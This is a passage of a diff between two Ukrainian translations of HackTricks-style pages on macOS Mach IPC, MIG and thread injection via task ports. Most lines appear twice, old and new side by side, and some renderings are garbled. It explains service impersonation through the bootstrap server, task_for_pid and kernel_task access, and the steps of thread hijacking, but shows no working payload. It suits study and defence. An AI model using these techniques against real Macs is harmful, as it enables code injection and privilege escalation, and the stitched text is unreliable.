Як вже згадувалося, можливо надсилати права, використовуючи Mach повідомлення, однак ви **не можете надіслати право, не маючи вже права** на відправку Mach повідомлення. Отже, як встановлюється перша комунікація?
Як вже згадувалося раніше, можливо надсилати права, використовуючи Mach повідомлення, однак ви **не можете надіслати право, не маючи вже права** на відправку Mach повідомлення. Отже, як встановлюється перша комунікація?
Для цього залучається **bootstrap server** (**launchd** в mac), оскільки **кожен може отримати право ВІДПРАВКИ до bootstrap server**, можливо попросити його про право на відправку повідомлення до іншого процесу:
Для цього залучається **bootstrap server** (**launchd** в mac), оскільки **кожен може отримати ПРАВО ВІДПРАВКИ до bootstrap server**, можливо попросити його про право на відправку повідомлення до іншого процесу:
1. Задача **A** створює **новий порт**, отримуючи **ПРАВО ОТРИМАННЯ** на нього.
1. Задача **A** створює **новий порт**, отримуючи **ПРАВО ОТРИМАННЯ** над ним.
2. Задача **A**, будучи власником ПРАВА ОТРИМАННЯ, **генерує ПРАВО ВІДПРАВКИ для порту**.
3. Задача **A** встановлює **з'єднання** з **bootstrap server** і **надсилає йому ПРАВО ВІДПРАВКИ** для порту, який вона згенерувала на початку.
- Пам'ятайте, що будь-хто може отримати ПРАВО ВІДПРАВКИ до bootstrap server.
4. Задача A надсилає повідомлення `bootstrap_register` до bootstrap server, щоб **асоціювати даний порт з ім'ям** на кшталт `com.apple.taska`.
5. Задача **B** взаємодіє з **bootstrap server**, щоб виконати bootstrap **lookup для імені сервісу** (`bootstrap_lookup`). Щоб bootstrap server міг відповісти, задача B надішле йому **ПРАВО ВІДПРАВКИ до порту, який вона раніше створила** в повідомленні lookup. Якщо lookup успішний, **сервер дублює ПРАВО ВІДПРАВКИ**, отримане від Задачі A, і **передає його Задачі B**.
5. Задача **B** взаємодіє з **bootstrap server**, щоб виконати bootstrap **lookup для імені сервісу** (`bootstrap_lookup`). Щоб bootstrap server міг відповісти, задача B надішле йому **ПРАВО ВІДПРАВКИ до порту, який вона раніше створила** в повідомленні lookup. Якщо пошук успішний, **сервер дублює ПРАВО ВІДПРАВКИ**, отримане від Задачі A, і **передає його Задачі B**.
- Пам'ятайте, що будь-хто може отримати ПРАВО ВІДПРАВКИ до bootstrap server.
6. З цим ПРАВОМ ВІДПРАВКИ **Задача B** здатна **надсилати** **повідомлення** **Задачі A**.
7. Для двосторонньої комунікації зазвичай задача **B** генерує новий порт з **ПРАВОМ ОТРИМАННЯ** та **ПРАВОМ ВІДПРАВКИ** і надає **ПРАВО ВІДПРАВКИ Задачі A**, щоб вона могла надсилати повідомлення до ЗАДАЧІ B (двостороння комунікація).
7. Для двосторонньої комунікації зазвичай задача **B** генерує новий порт з **ПРАВОМ ОТРИМАННЯ** і **ПРАВОМ ВІДПРАВКИ**, і надає **ПРАВО ВІДПРАВКИ Задачі A**, щоб вона могла надсилати повідомлення до Задачі B (двостороння комунікація).
Bootstrap server **не може аутентифікувати** ім'я сервісу, яке заявляє задача. Це означає, що **задача** може потенційно **вдаватись під будь-яку системну задачу**, наприклад, неправильно **заявляючи ім'я сервісу авторизації** і потім схвалюючи кожен запит.
Потім Apple зберігає **імена сервісів, наданих системою**, у захищених конфігураційних файлах, розташованих у **каталогах, захищених SIP**: `/System/Library/LaunchDaemons` та `/System/Library/LaunchAgents`. Поряд з кожним ім'ям сервісу також зберігається **асоційований бінарний файл**. Bootstrap server створить і утримає **ПРАВО ОТРИМАННЯ для кожного з цих імен сервісів**.
Потім Apple зберігає **імена сервісів, наданих системою**, у захищених конфігураційних файлах, розташованих у **SIP-захищених** каталогах: `/System/Library/LaunchDaemons` та `/System/Library/LaunchAgents`. Поряд з кожним ім'ям сервісу також зберігається **асоційований бінарний файл**. Bootstrap server створить і утримає **ПРАВО ОТРИМАННЯ для кожного з цих імен сервісів**.
Для цих попередньо визначених сервісів **процес пошуку трохи відрізняється**. Коли ім'я сервісу шукається, launchd динамічно запускає сервіс. Новий робочий процес виглядає так:
- Задача **B** ініціює bootstrap **lookup** для імені сервісу.
- **launchd** перевіряє, чи задача працює, і якщо ні, **запускає** її.
- **launchd** перевіряє, чи працює задача, і якщо ні, **запускає** її.
- Задача **A** (сервіс) виконує **bootstrap check-in** (`bootstrap_check_in()`). Тут **bootstrap** сервер створює ПРАВО ВІДПРАВКИ, утримує його і **передає ПРАВО ОТРИМАННЯ Задачі A**.
- launchd дублює **ПРАВО ВІДПРАВКИ і надсилає його Задачі B**.
- Задача **B** генерує новий порт з **ПРАВОМ ОТРИМАННЯ** та **ПРАВОМ ВІДПРАВКИ**, і надає **ПРАВО ВІДПРАВКИ Задачі A** (сервісу), щоб вона могла надсилати повідомлення до ЗАДАЧІ B (двостороння комунікація).
- Задача **B** генерує новий порт з **ПРАВОМ ОТРИМАННЯ** і **ПРАВОМ ВІДПРАВКИ**, і надає **ПРАВО ВІДПРАВКИ Задачі A** (сервісу), щоб вона могла надсилати повідомлення до Задачі B (двостороння комунікація).
Однак цей процес застосовується лише до попередньо визначених системних задач. Несистемні задачі все ще працюють, як було описано спочатку, що може потенційно дозволити вдавання.
@ -127,7 +127,7 @@ mach_msg_id_t msgh_id;
Повідомлення формуються заголовком **`mach_msg_header_t`**, за яким слідує **тіло** та **трейлер** (якщо є), і це може надати дозвіл на відповідь. У цих випадках ядру просто потрібно передати повідомлення від одного завдання до іншого.
**Трейлер** - це **інформація, додана до повідомлення ядром** (не може бути встановлена користувачем), яку можна запитати під час отримання повідомлення з прапорами `MACH_RCV_TRAILER_<trailer_opt>` (існує різна інформація, яку можна запитати).
**Трейлер** - це **інформація, додана до повідомлення ядром** (не може бути встановлена користувачем), яку можна запитати під час отримання повідомлення з прапорами `MACH_RCV_TRAILER_<trailer_opt>` (можна запитати різну інформацію).
#### Складні повідомлення
@ -150,10 +150,10 @@ unsigned int pad3 : 24;
mach_msg_descriptor_type_t type : 8;
} mach_msg_type_descriptor_t;
```
В 32-бітних системах усі дескриптори мають розмір 12B, а тип дескриптора знаходиться в 11-му байті. У 64-бітних системах розміри варіюються.
В 32-бітних системах всі дескриптори мають розмір 12B, а тип дескриптора знаходиться в 11-му. У 64-бітних системах розміри варіюються.
> [!CAUTION]
> Ядро скопіює дескриптори з одного завдання в інше, але спочатку **створюючи копію в пам'яті ядра**. Цю техніку, відому як "Feng Shui", зловживали в кількох експлойтах, щоб змусити **ядро копіювати дані в його пам'яті**, змушуючи процес надсилати дескриптори самому собі. Потім процес може отримувати повідомлення (ядро їх звільнить).
> Ядро скопіює дескриптори з одного завдання в інше, але спочатку **створюючи копію в пам'яті ядра**. Цю техніку, відому як "Feng Shui", зловживали в кількох експлойтах, щоб змусити **ядро копіювати дані в його пам'яті**, змушуючи процес надсилати дескриптори самому собі. Тоді процес може отримувати повідомлення (ядро їх звільнить).
>
> Також можливо **надіслати права порту в уразливий процес**, і права порту просто з'являться в процесі (навіть якщо він їх не обробляє).
@ -164,13 +164,13 @@ mach_msg_descriptor_type_t type : 8;
- **`mach_port_allocate` | `mach_port_construct`**: **Створити** порт.
- `mach_port_allocate` також може створити **набір портів**: право отримання над групою портів. Коли отримується повідомлення, вказується порт, з якого воно надійшло.
- `mach_port_allocate_name`: Змінити ім'я порту (за замовчуванням 32-бітне ціле число)
- `mach_port_names`: Отримати імена портів з цільового
- `mach_port_names`: Отримати імена портів з цільового завдання
- `mach_port_type`: Отримати права завдання над ім'ям
- `mach_port_rename`: Перейменувати порт (як dup2 для FD)
- `mach_port_allocate`: Виділити новий RECEIVE, PORT_SET або DEAD_NAME
- `mach_port_insert_right`: Створити нове право в порту, де у вас є RECEIVE
- `mach_port_...`
- **`mach_msg`** | **`mach_msg_overwrite`**: Функції, які використовуються для **надсилання та отримання mach повідомлень**. Версія з перезаписом дозволяє вказати інший буфер для отримання повідомлень (інша версія просто повторно використовує його).
- **`mach_msg`** | **`mach_msg_overwrite`**: Функції, які використовуються для **надсилання та отримання mach-повідомлень**. Версія з перезаписом дозволяє вказати інший буфер для отримання повідомлень (інша версія просто повторно використовує його).
### Debug mach_msg
@ -267,9 +267,9 @@ name ipc-object rights flags boost reqs recv send sonce oref q
+ send -------- --- 1 <- 0x00002603 (74295) passd
[...]
```
**ім'я** - це стандартне ім'я, яке надається порту (перевірте, як воно **збільшується** в перших 3 байтах). **`ipc-object`** - це **заскоблене** унікальне **ідентифікатор** порту.\
**ім'я** - це стандартне ім'я, яке надається порту (перевірте, як воно **збільшується** в перших 3 байтах). **`ipc-object`** - це **обфусцований** унікальний **ідентифікатор** порту.\
Зверніть увагу також на те, як порти з лише **`send`** правами **ідентифікують власника** (ім'я порту + pid).\
Також зверніть увагу на використання **`+`**, щоб вказати на **інші завдання, пов'язані з тим же портом**.
Також зверніть увагу на використання **`+`**, щоб вказати на **інші завдання, пов'язані з тим самим портом**.
Також можливо використовувати [**procesxp**](https://www.newosxbook.com/tools/procexp.html), щоб побачити також **зареєстровані імена служб** (з вимкненим SIP через необхідність `com.apple.system-task-port`):
```
@ -413,18 +413,18 @@ printf("Sent a message\n");
Ці порти представлені номером.
**SEND** права можна отримати, викликавши **`host_get_special_port`**, а **RECEIVE** права - викликавши **`host_set_special_port`**. Однак обидва виклики вимагають **`host_priv`** порт, до якого може отримати доступ лише root. Більше того, в минулому root міг викликати **`host_set_special_port`** і захоплювати довільні порти, що дозволяло, наприклад, обійти підписи коду, захоплюючи `HOST_KEXTD_PORT` (SIP тепер запобігає цьому).
**SEND** права можна отримати, викликавши **`host_get_special_port`**, а **RECEIVE** права - викликавши **`host_set_special_port`**. Однак обидва виклики вимагають **`host_priv`** порт, до якого може отримати доступ лише root. Більше того, раніше root міг викликати **`host_set_special_port`** і захоплювати довільні порти, що, наприклад, дозволяло обійти підписи коду, захоплюючи `HOST_KEXTD_PORT` (SIP тепер цьому запобігає).
Ці порти поділяються на 2 групи: **перші 7 портів належать ядру**, зокрема 1 `HOST_PORT`, 2 `HOST_PRIV_PORT`, 3 `HOST_IO_MASTER_PORT` і 7 - це `HOST_MAX_SPECIAL_KERNEL_PORT`.\
Ті, що починаються **з** номера **8**, **належать системним демонів**, і їх можна знайти, оголошеними в [**`host_special_ports.h`**](https://opensource.apple.com/source/xnu/xnu-4570.1.46/osfmk/mach/host_special_ports.h.auto.html).
- **Порт хоста**: Якщо процес має **SEND** привілей на цьому порту, він може отримати **інформацію** про **систему**, викликаючи його рутинні функції, такі як:
- **Host port**: Якщо процес має **SEND** привілей на цьому порту, він може отримати **інформацію** про **систему**, викликаючи його рутинні функції, такі як:
- `host_processor_info`: Отримати інформацію про процесор
- `host_info`: Отримати інформацію про хост
- `host_virtual_physical_table_info`: Віртуальна/фізична таблиця сторінок (вимагає MACH_VMDEBUG)
- `host_statistics`: Отримати статистику хоста
- `mach_memory_info`: Отримати макет пам'яті ядра
- **Привілейований порт хоста**: Процес з **SEND** правом на цьому порту може виконувати **привілейовані дії**, такі як показ даних завантаження або спроба завантажити розширення ядра. **Процес повинен бути root**, щоб отримати цей дозвіл.
- **Host Priv port**: Процес з **SEND** правом на цьому порту може виконувати **привілейовані дії**, такі як показ даних завантаження або спроба завантажити розширення ядра. **Процес повинен бути root**, щоб отримати цей дозвіл.
- Більше того, для виклику **`kext_request`** API потрібно мати інші права **`com.apple.private.kext*`**, які надаються лише бінарним файлам Apple.
- Інші рутинні функції, які можна викликати:
- `host_get_boot_info`: Отримати `machine_boot_info()`
@ -440,7 +440,7 @@ procexp all ports | grep "HSP"
```
### Завдання Спеціальні Порти
Це порти, зарезервовані для відомих сервісів. Їх можна отримати/встановити, викликавши `task_[get/set]_special_port`. Вони можуть бути знайдені в `task_special_ports.h`:
Це порти, зарезервовані для відомих сервісів. Можна отримати/встановити їх, викликавши `task_[get/set]_special_port`. Вони можуть бути знайдені в `task_special_ports.h`:
```c
typedef int task_special_port_t;
@ -452,10 +452,10 @@ world.*/
#define TASK_PAGED_LEDGER_PORT 6 /* Paged resource ledger for task. */
```
- **TASK_KERNEL_PORT**\[task-self send right]: Порт, що використовується для контролю цього завдання. Використовується для надсилання повідомлень, які впливають на завдання. Це порт, що повертається функцією **mach_task_self (див. Task Ports нижче)**.
- **TASK_BOOTSTRAP_PORT**\[bootstrap send right]: Порт завантаження завдання. Використовується для надсилання повідомлень з проханням повернути інші порти системних служб.
- **TASK_HOST_NAME_PORT**\[host-self send right]: Порт, що використовується для запиту інформації про місткість хоста. Це порт, що повертається функцією **mach_host_self**.
- **TASK_BOOTSTRAP_PORT**\[bootstrap send right]: Порт завантаження завдання. Використовується для надсилання повідомлень з запитом на повернення інших портів системних служб.
- **TASK_HOST_NAME_PORT**\[host-self send right]: Порт, що використовується для запиту інформації про місто, що містить. Це порт, що повертається функцією **mach_host_self**.
- **TASK_WIRED_LEDGER_PORT**\[ledger send right]: Порт, що вказує на джерело, з якого це завдання отримує свою фіксовану пам'ять ядра.
- **TASK_PAGED_LEDGER_PORT**\[ledger send right]: Порт, що вказує на джерело, з якого це завдання отримує свою пам'ять, що управляється за замовчуванням.
- **TASK_PAGED_LEDGER_PORT**\[ledger send right]: Порт, що вказує на джерело, з якого це завдання отримує свою пам'ять за замовчуванням.
### Task Ports
@ -463,10 +463,10 @@ world.*/
Є дві дуже цікаві функції, пов'язані з цим:
- `task_for_pid(target_task_port, pid, &task_port_of_pid)`: Отримати право SEND для порту завдання, пов'язаного з вказаним `pid`, і надати його вказаному `target_task_port` (який зазвичай є завданням виклику, що використовує `mach_task_self()`, але може бути SEND портом для іншого завдання).
- `task_for_pid(target_task_port, pid, &task_port_of_pid)`: Отримати право SEND для порту завдання, пов'язаного з вказаним `pid`, і надати його вказаному `target_task_port` (який зазвичай є завданням виклику, що використовує `mach_task_self()`, але може бути портом SEND для іншого завдання).
- `pid_for_task(task, &pid)`: Знаючи право SEND для завдання, знайти, до якого PID це завдання пов'язане.
Щоб виконувати дії в межах завдання, завдання потрібно право `SEND` на себе, викликавши `mach_task_self()` (яка використовує `task_self_trap` (28)). З цим дозволом завдання може виконувати кілька дій, таких як:
Щоб виконувати дії в межах завдання, завдання потрібно право `SEND` на себе, викликавши `mach_task_self()` (який використовує `task_self_trap` (28)). З цим дозволом завдання може виконувати кілька дій, таких як:
- `task_threads`: Отримати право SEND на всі порти завдання потоків завдання
- `task_info`: Отримати інформацію про завдання
@ -483,9 +483,9 @@ world.*/
Пам'ятайте, що оскільки **ядро також є завданням**, якщо хтось зможе отримати **дозволи SEND** на **`kernel_task`**, він зможе змусити ядро виконувати що завгодно (jailbreaks).
- Викликайте `mach_task_self()` для **отримання імені** для цього порту для завдання виклику. Цей порт лише **успадковується** через **`exec()`**; нове завдання, створене за допомогою `fork()`, отримує новий порт завдання (як особливий випадок, завдання також отримує новий порт завдання після `exec()` у suid бінарному файлі). Єдиний спосіб створити завдання та отримати його порт - це виконати ["танець обміну портами"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html) під час виконання `fork()`.
- Викликайте `mach_task_self()` для **отримання імені** для цього порту для завдання виклику. Цей порт лише **успадковується** через **`exec()`**; нове завдання, створене за допомогою `fork()`, отримує новий порт завдання (як особливий випадок, завдання також отримує новий порт завдання після `exec()` у бінарному файлі suid). Єдиний спосіб створити завдання та отримати його порт - це виконати ["танець обміну портами"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html) під час виконання `fork()`.
- Це обмеження для доступу до порту (з `macos_task_policy` з бінарного файлу `AppleMobileFileIntegrity`):
- Якщо додаток має **`com.apple.security.get-task-allow` entitlement**, процеси від **того ж користувача можуть отримати доступ до порту завдання** (зазвичай додається Xcode для налагодження). Процес **нотаризації** не дозволить цього для виробничих випусків.
- Якщо додаток має **`com.apple.security.get-task-allow` entitlement**, процеси з **одного й того ж користувача можуть отримати доступ до порту завдання** (зазвичай додається Xcode для налагодження). Процес **нотаризації** не дозволить цього для виробничих випусків.
- Додатки з **`com.apple.system-task-ports`** entitlement можуть отримати **порт завдання для будь-якого** процесу, за винятком ядра. У старіших версіях це називалося **`task_for_pid-allow`**. Це надається лише додаткам Apple.
- **Root може отримати доступ до портів завдання** додатків, **не** скомпільованих з **захищеним** середовищем виконання (і не від Apple).
@ -493,7 +493,7 @@ world.*/
### Thread Ports
Потоки також мають асоційовані порти, які видимі з завдання, що викликає **`task_threads`**, і з процесора з `processor_set_threads`. Право SEND на порт потоку дозволяє використовувати функції з підсистеми `thread_act`, такі як:
Потоки також мають асоційовані порти, які видимі з завдання, що викликає **`task_threads`**, і з процесора за допомогою `processor_set_threads`. Право SEND на порт потоку дозволяє використовувати функції з підсистеми `thread_act`, такі як:
- `thread_terminate`
- `thread_[get/set]_state`
@ -776,7 +776,7 @@ gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject
Було можливим **впровадити простий shellcode** для виконання команди, оскільки він **не потребував роботи з posix** сумісними api, лише з Mach. **Більш складні впровадження** вимагатимуть, щоб **потік** також був **сумісний з posix**.
Отже, щоб **покращити потік**, він повинен викликати **`pthread_create_from_mach_thread`**, що створить **дійсний pthread**. Потім цей новий pthread може **викликати dlopen**, щоб **завантажити dylib** з системи, тому замість написання нового shellcode для виконання різних дій можна завантажити власні бібліотеки.
Отже, щоб **покращити потік**, він повинен викликати **`pthread_create_from_mach_thread`**, що **створить дійсний pthread**. Потім цей новий pthread може **викликати dlopen**, щоб **завантажити dylib** з системи, тому замість написання нового shellcode для виконання різних дій можна завантажити користувацькі бібліотеки.
Ви можете знайти **приклади dylibs** в (наприклад, той, що генерує журнал, а потім ви можете його прослухати):
@ -1076,9 +1076,9 @@ macos-thread-injection-via-task-port.md
## Порти виключень
Коли в потоці виникає виключення, це виключення надсилається до призначеного порту виключення потоку. Якщо потік не обробляє його, тоді воно надсилається до портів виключень завдання. Якщо завдання не обробляє його, тоді воно надсилається до порту хоста, який управляється launchd (де воно буде визнано). Це називається триажем виключень.
Коли в потоці виникає виключення, це виключення надсилається до призначеного порту виключення потоку. Якщо потік не обробляє його, тоді воно надсилається до портів виключення завдання. Якщо завдання не обробляє його, тоді воно надсилається до порту хоста, який управляється launchd (де воно буде визнано). Це називається триажем виключень.
Зверніть увагу, що в кінці, якщо не обробити належним чином, звіт зазвичай буде оброблений демоном ReportCrash. Однак можливо, що інший потік у тому ж завданні обробляє виключення, це те, що роблять інструменти звітності про збої, такі як `PLCreashReporter`.
Зверніть увагу, що в кінці, зазвичай, якщо не обробити належним чином, звіт буде оброблений демоном ReportCrash. Однак можливо, що інший потік у тому ж завданні обробить виключення, це те, що роблять інструменти звітності про збої, такі як `PLCreashReporter`.
## Інші об'єкти
@ -1087,7 +1087,7 @@ macos-thread-injection-via-task-port.md
Будь-який користувач може отримати інформацію про годинник, однак для того, щоб встановити час або змінити інші налаштування, потрібно бути root.
Щоб отримати інформацію, можна викликати функції з підсистеми `clock`, такі як: `clock_get_time`, `clock_get_attributtes` або `clock_alarm`\
Щоб змінити значення, можна використовувати підсистему `clock_priv` з функціями, такими як `clock_set_time` і `clock_set_attributes`.
Щоб змінити значення, підсистема `clock_priv` може бути використана з функціями, такими як `clock_set_time` і `clock_set_attributes`
### Процесори та набір процесорів
@ -1097,8 +1097,8 @@ API процесора дозволяє контролювати один лог
Це деякі цікаві API для взаємодії з набором процесорів:
- `processor_set_statistics`
- `processor_set_tasks`: Повертає масив прав на відправлення для всіх завдань у наборі процесорів
- `processor_set_threads`: Повертає масив прав на відправлення для всіх потоків у наборі процесорів
- `processor_set_tasks`: Повертає масив прав на відправлення для всіх завдань всередині набору процесорів
- `processor_set_threads`: Повертає масив прав на відправлення для всіх потоків всередині набору процесорів
- `processor_set_stack_usage`
- `processor_set_info`

16
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
View File

@ -6,15 +6,15 @@
MIG був створений для **спрощення процесу створення коду Mach IPC**. Він в основному **генерує необхідний код** для зв'язку сервера та клієнта відповідно до заданого визначення. Навіть якщо згенерований код виглядає неохайно, розробнику просто потрібно імпортувати його, і його код стане набагато простішим, ніж раніше.
Визначення вказується на мові визначення інтерфейсу (IDL) з використанням розширення `.defs`.
Визначення вказується в Мові визначення інтерфейсу (IDL) з використанням розширення `.defs`.
Ці визначення мають 5 секцій:
- **Оголошення підсистеми**: Ключове слово subsystem використовується для вказівки **імені** та **ідентифікатора**. Також можливо позначити його як **`KernelServer`**, якщо сервер повинен працювати в ядрі.
- **Оголошення підсистеми**: Ключове слово subsystem використовується для вказівки **імені** та **id**. Також можливо позначити його як **`KernelServer`**, якщо сервер повинен працювати в ядрі.
- **Включення та імпорти**: MIG використовує C-препроцесор, тому він може використовувати імпорти. Більше того, можливо використовувати `uimport` та `simport` для коду, згенерованого користувачем або сервером.
- **Оголошення типів**: Можливо визначити типи даних, хоча зазвичай він імпортує `mach_types.defs` та `std_types.defs`. Для користувацьких типів можна використовувати деякий синтаксис:
- \[i`n/out]tran`: Функція, яка повинна бути переведена з вхідного або на вихідне повідомлення
- `c[user/server]type`: Відображення на інший C тип.
- `c[user/server]type`: Відображення на інший тип C.
- `destructor`: Викликати цю функцію, коли тип звільняється.
- **Операції**: Це визначення методів RPC. Є 5 різних типів:
- `routine`: Очікує відповідь
@ -42,7 +42,7 @@ n2 : uint32_t);
```
Зверніть увагу, що перший **аргумент - це порт для прив'язки** і MIG **автоматично обробить порт відповіді** (якщо не викликати `mig_get_reply_port()` у коді клієнта). Більше того, **ID операцій** буде **послідовним**, починаючи з вказаного ID підсистеми (тому, якщо операція застаріла, вона видаляється, а `skip` використовується для продовження використання її ID).
Тепер використовуйте MIG для генерації коду сервера та клієнта, які зможуть спілкуватися один з одним для виклику функції Subtract:
Тепер використовуйте MIG для генерації коду сервера та клієнта, який зможе спілкуватися один з одним для виклику функції Subtract:
```bash
mig -header myipcUser.h -sheader myipcServer.h myipc.defs
```
@ -221,7 +221,7 @@ NDR_record експортується з `libsystem_kernel.dylib`, і це ст
Це цікаво, оскільки якщо `_NDR_record` знайдено в бінарному файлі як залежність (`jtool2 -S <binary> | grep NDR` або `nm`), це означає, що бінарний файл є клієнтом або сервером MIG.
Більше того, **MIG сервери** мають таблицю диспетчеризації в `__DATA.__const` (або в `__CONST.__constdata` в ядрі macOS і `__DATA_CONST.__const` в інших ядрах \*OS). Це можна вивантажити за допомогою **`jtool2`**.
Більше того, **MIG сервери** мають таблицю розподілу в `__DATA.__const` (або в `__CONST.__constdata` в ядрі macOS і `__DATA_CONST.__const` в інших ядрах \*OS). Це можна вивантажити за допомогою **`jtool2`**.
А **MIG клієнти** використовуватимуть `__NDR_record`, щоб надсилати з `__mach_msg` до серверів.
@ -235,13 +235,13 @@ NDR_record експортується з `libsystem_kernel.dylib`, і це ст
```bash
jtool2 -d __DATA.__const myipc_server | grep MIG
```
Більше того, функції MIG є просто обгортками для фактичних функцій, які викликаються, що означає, що отримавши їх дизасемблювання та здійснивши пошук за BL, ви можете знайти фактичну функцію, яка викликається:
Більше того, функції MIG є просто обгортками для фактичних функцій, які викликаються, що означає, що отримавши їх дизасемблювання та виконавши пошук за BL, ви можете знайти фактичну функцію, яка викликається:
```bash
jtool2 -d __DATA.__const myipc_server | grep BL
```
### Assembly
Було раніше згадано, що функція, яка буде відповідати за **виклик правильної функції в залежності від отриманого ідентифікатора повідомлення**, називається `myipc_server`. Однак зазвичай у вас не буде символів бінарного файлу (немає імен функцій), тому цікаво **перевірити, як це виглядає в декомпільованому вигляді**, оскільки це завжди буде дуже схоже (код цієї функції незалежний від експонованих функцій):
Було раніше згадано, що функція, яка буде відповідати за **виклик правильної функції в залежності від отриманого ідентифікатора повідомлення**, називається `myipc_server`. Однак зазвичай у вас не буде символів бінарного файлу (немає імен функцій), тому цікаво **перевірити, як вона виглядає в декомпільованому вигляді**, оскільки код цієї функції завжди буде дуже схожим (код цієї функції незалежний від експонованих функцій):
{{#tabs}}
{{#tab name="myipc_server decompiled 1"}}
@ -289,7 +289,7 @@ return rax;
{{#endtab}}
{{#tab name="myipc_server decompiled 2"}}
Це та ж функція, декомпільована в іншій безкоштовній версії Hopper:
Це та ж сама функція, декомпільована в іншій безкоштовній версії Hopper:
<pre class="language-c"><code class="lang-c">int _myipc_server(int arg0, int arg1) {
r31 = r31 - 0x40;

30
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md
View File

@ -7,35 +7,35 @@
- [https://github.com/bazad/threadexec](https://github.com/bazad/threadexec)
- [https://gist.github.com/knightsc/bd6dfeccb02b77eb6409db5601dcef36](https://gist.github.com/knightsc/bd6dfeccb02b77eb6409db5601dcef36)
## 1. Thread Hijacking
## 1. Захоплення потоку
Спочатку функція **`task_threads()`** викликається на порту завдання для отримання списку потоків з віддаленого завдання. Вибирається потік для захоплення. Цей підхід відрізняється від звичайних методів ін'єкції коду, оскільки створення нового віддаленого потоку заборонено через нові заходи, що блокують `thread_create_running()`.
Спочатку функція **`task_threads()`** викликається на порту завдання для отримання списку потоків з віддаленого завдання. Один з потоків обирається для захоплення. Цей підхід відрізняється від звичайних методів ін'єкції коду, оскільки створення нового віддаленого потоку заборонено через нові заходи, що блокують `thread_create_running()`.
Для контролю потоку викликається **`thread_suspend()`**, що зупиняє його виконання.
Єдині операції, дозволені на віддаленому потоці, включають **зупинку** та **початок** його, **отримання** та **модифікацію** значень його регістрів. Віддалені виклики функцій ініціюються шляхом налаштування регістрів `x0` до `x7` на **аргументи**, налаштування **`pc`** на цільову функцію та активації потоку. Забезпечення того, щоб потік не зламався після повернення, вимагає виявлення повернення.
Одна зі стратегій полягає в **реєстрації обробника виключень** для віддаленого потоку за допомогою `thread_set_exception_ports()`, налаштовуючи регістр `lr` на недійсну адресу перед викликом функції. Це викликає виключення після виконання функції, надсилаючи повідомлення на порт виключень, що дозволяє перевірити стан потоку для відновлення значення повернення. Альтернативно, як було прийнято з експлойту Ian Beers triple_fetch, `lr` налаштовується на безкінечний цикл. Регістри потоку потім постійно моніторяться, поки **`pc` не вказує на цю інструкцію**.
Одна зі стратегій полягає в **реєстрації обробника виключень** для віддаленого потоку за допомогою `thread_set_exception_ports()`, налаштовуючи регістр `lr` на недійсну адресу перед викликом функції. Це викликає виключення після виконання функції, надсилаючи повідомлення на порт виключень, що дозволяє перевірити стан потоку для відновлення значення повернення. Альтернативно, як це було прийнято з експлойту Іана Біра triple_fetch, `lr` налаштовується на безкінечний цикл. Регістри потоку потім постійно моніторяться, поки **`pc` не вказує на цю інструкцію**.
## 2. Mach ports for communication
## 2. Mach порти для зв'язку
Наступний етап полягає в створенні Mach портів для полегшення зв'язку з віддаленим потоком. Ці порти є важливими для передачі довільних прав на відправлення та отримання між завданнями.
Для двостороннього зв'язку створюються два права отримання Mach: одне в локальному, а інше в віддаленому завданні. Потім право на відправлення для кожного порту передається до відповідного завдання, що дозволяє обмінюватися повідомленнями.
Для двостороннього зв'язку створюються два права на отримання Mach: одне в локальному, а інше в віддаленому завданні. Потім право на відправлення для кожного порту передається до відповідного завдання, що дозволяє обмінюватися повідомленнями.
Зосереджуючись на локальному порту, право отримання утримується локальним завданням. Порт створюється за допомогою `mach_port_allocate()`. Виклик полягає в передачі права на відправлення до цього порту в віддалене завдання.
Зосереджуючись на локальному порту, право на отримання утримується локальним завданням. Порт створюється за допомогою `mach_port_allocate()`. Виклик полягає в передачі права на відправлення до цього порту в віддалене завдання.
Одна зі стратегій полягає в використанні `thread_set_special_port()`, щоб помістити право на відправлення до локального порту в `THREAD_KERNEL_PORT` віддаленого потоку. Потім віддаленому потоку вказується викликати `mach_thread_self()`, щоб отримати право на відправлення.
Одна зі стратегій полягає в використанні `thread_set_special_port()` для розміщення права на відправлення до локального порту в `THREAD_KERNEL_PORT` віддаленого потоку. Потім віддаленому потоку надається команда викликати `mach_thread_self()`, щоб отримати право на відправлення.
Для віддаленого порту процес в основному обернений. Віддаленому потоку вказується створити Mach порт за допомогою `mach_reply_port()` (оскільки `mach_port_allocate()` не підходить через свій механізм повернення). Після створення порту викликається `mach_port_insert_right()` в віддаленому потоці для встановлення права на відправлення. Це право потім зберігається в ядрі за допомогою `thread_set_special_port()`. Повертаючись до локального завдання, `thread_get_special_port()` використовується на віддаленому потоці для отримання права на відправлення до новоствореного Mach порту в віддаленому завданні.
Для віддаленого порту процес в основному обернений. Віддаленому потоку надається команда створити Mach порт за допомогою `mach_reply_port()` (оскільки `mach_port_allocate()` не підходить через свій механізм повернення). Після створення порту викликається `mach_port_insert_right()` в віддаленому потоці для встановлення права на відправлення. Це право потім зберігається в ядрі за допомогою `thread_set_special_port()`. Повертаючись до локального завдання, використовується `thread_get_special_port()` на віддаленому потоці для отримання права на відправлення до новоствореного Mach порту в віддаленому завданні.
Завершення цих кроків призводить до створення Mach портів, закладаючи основу для двостороннього зв'язку.
## 3. Basic Memory Read/Write Primitives
## 3. Основні примітиви читання/запису пам'яті
У цьому розділі увага зосереджена на використанні примітиву виконання для встановлення базових примітивів читання та запису пам'яті. Ці початкові кроки є вирішальними для отримання більшого контролю над віддаленим процесом, хоча примітиви на цьому етапі не будуть служити багатьом цілям. Незабаром вони будуть оновлені до більш просунутих версій.
У цьому розділі увага зосереджена на використанні примітиву виконання для встановлення основних примітивів читання та запису пам'яті. Ці початкові кроки є вирішальними для отримання більшого контролю над віддаленим процесом, хоча примітиви на цьому етапі не виконуватимуть багато функцій. Незабаром вони будуть оновлені до більш просунутих версій.
### Memory Reading and Writing Using Execute Primitive
### Читання та запис пам'яті за допомогою примітиву виконання
Мета полягає в тому, щоб виконати читання та запис пам'яті за допомогою специфічних функцій. Для читання пам'яті використовуються функції, що нагадують наступну структуру:
```c
@ -63,7 +63,7 @@ ret
Сканування загальних бібліотек виявило відповідні кандидати для цих операцій:
1. **Читання пам'яті:**
